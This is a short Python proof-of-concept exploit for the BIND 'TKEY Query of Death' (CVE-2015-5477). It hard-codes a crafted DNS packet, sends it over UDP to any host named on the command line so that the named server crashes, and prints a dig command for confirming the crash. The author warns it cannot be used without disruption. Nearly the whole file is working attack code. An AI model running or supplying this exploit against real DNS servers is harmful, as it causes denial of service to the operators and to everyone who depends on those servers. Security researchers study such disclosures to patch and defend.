#!/usr/bin/python
# Title: BIND  Remote DoS via TKEY queries
# aka: DNS TKEY Query of Death
# Author: Lorenzo Corsini <serdat>
# E-Mail: serdat5[at]gmail[dot]com
# Twitter: https://twitter.com/serdat5tm

# References:
# https://kb.isc.org/article/AA-01272
# https://www.isc.org/blogs/about-cve-2015-5477-an-error-in-handling-tkey-queries-can-cause-named-to-exit-with-a-require-assertion-failure/

# Warning there is no way to use this PoC in a non-desruptive manner. 
# Use with care. I'm not responsible for what you'll do with that

import socket
import sys

#Not randomized.
DNS_PACKET='\x04X\x00\x80\x00\x01\x00\x01\x00\x00\x00\x01\x03xxx\x00\x00\xf9\x00\xff\x03xxx\x00\x00\xf9\x00\xff\x00\x00\x00\x00\x00%\x03xxx\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00\x10\x10\x10\x10\x10\x10\x10\x10\x10\x10\x10\x10\x10\x10\x10\x10\x10\x00\x00\x03xxx\x00\x00\x10\x00\xff\x00\x00\x00\x00\x00%$aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa'

try:
  HOST=sys.argv[1]
  PORT= 53
except:
  print "Usage: %s host_to_crash" & sys.argv[0]
  sys.exit(-1)

print "Exploiting target at %s" % HOST

s=socket.socket(socket.AF_INET,socket.SOCK_DGRAM)
s.sendto(DNS_PACKET,(HOST,PORT))
s.close()

print "Check Manually if the exploit worked... try launching:"
print "dig @%s CR4SH3D any" % HOST